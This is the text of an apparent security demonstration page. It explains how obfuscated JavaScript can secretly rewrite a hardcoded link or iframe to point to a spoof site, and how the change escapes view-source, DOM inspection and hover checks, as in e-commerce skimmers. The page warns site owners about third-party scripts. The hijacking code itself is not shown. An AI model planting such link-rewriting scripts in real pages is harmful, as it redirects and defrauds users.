JavaScript Supply Chain Attack Example - Sneakier URL/IFRAME Re-writing

This page provides a short and simple example of JavaScript's capability to hijack (re-write) a hardcoded URL (or IFRAME).

What To Expect

This page presents two links that will open in new tabs when clicked. One link is left alone but the Wikipedia link will be hijacked to a spoof site!

Notes:

If you are using a Script blocker, e.g. NoScript, this will not operate as intended.
The technique can be used on dynamic and static links and other tags such as an IFRAME.

Checking It Out - Under the Covers

If you can check out the link as follows:

View the Source (right click and View Page Source) - shows the unaltered page source and link.
Inspect the DOM (right click and Inspect or Inspect Element) - also shows he unaltered page source and link.
In this example, hovering over the link also shows the link as unaltered.
Furthermore, the script has been obfuscated.

Simple Demonstration of Risk

This is not intended to be a full-function URL hijacker. We've shown a few of the methods used by criminal gangs in e-commerce skimmers. Normally a skimmer would simply include a JavaScript via a link (below) - We've left this as inline script for clarity and simplicity:

<script src="any-third-party-script-site.org/package.js"></script>

Our example is deliberately minimalistic. We wanted an example that was clear, uncluttered, and free of excesses. This is provided on a stand-alone page without styles, branding, or other trappings of a modern web site.

In the case of a real skimmer, no amount of inspection of your web host or your source will find the problem. You need to look at the third party site! Most shopping carts include third party scripts from dozens of URLs - every one a potential risk. Your entire site could be housed on an optical drive with continuous file integrity checking and you would not detect a change of code on a third party site. This effectively demonstrates the risks of using third party scripts you have no controls over.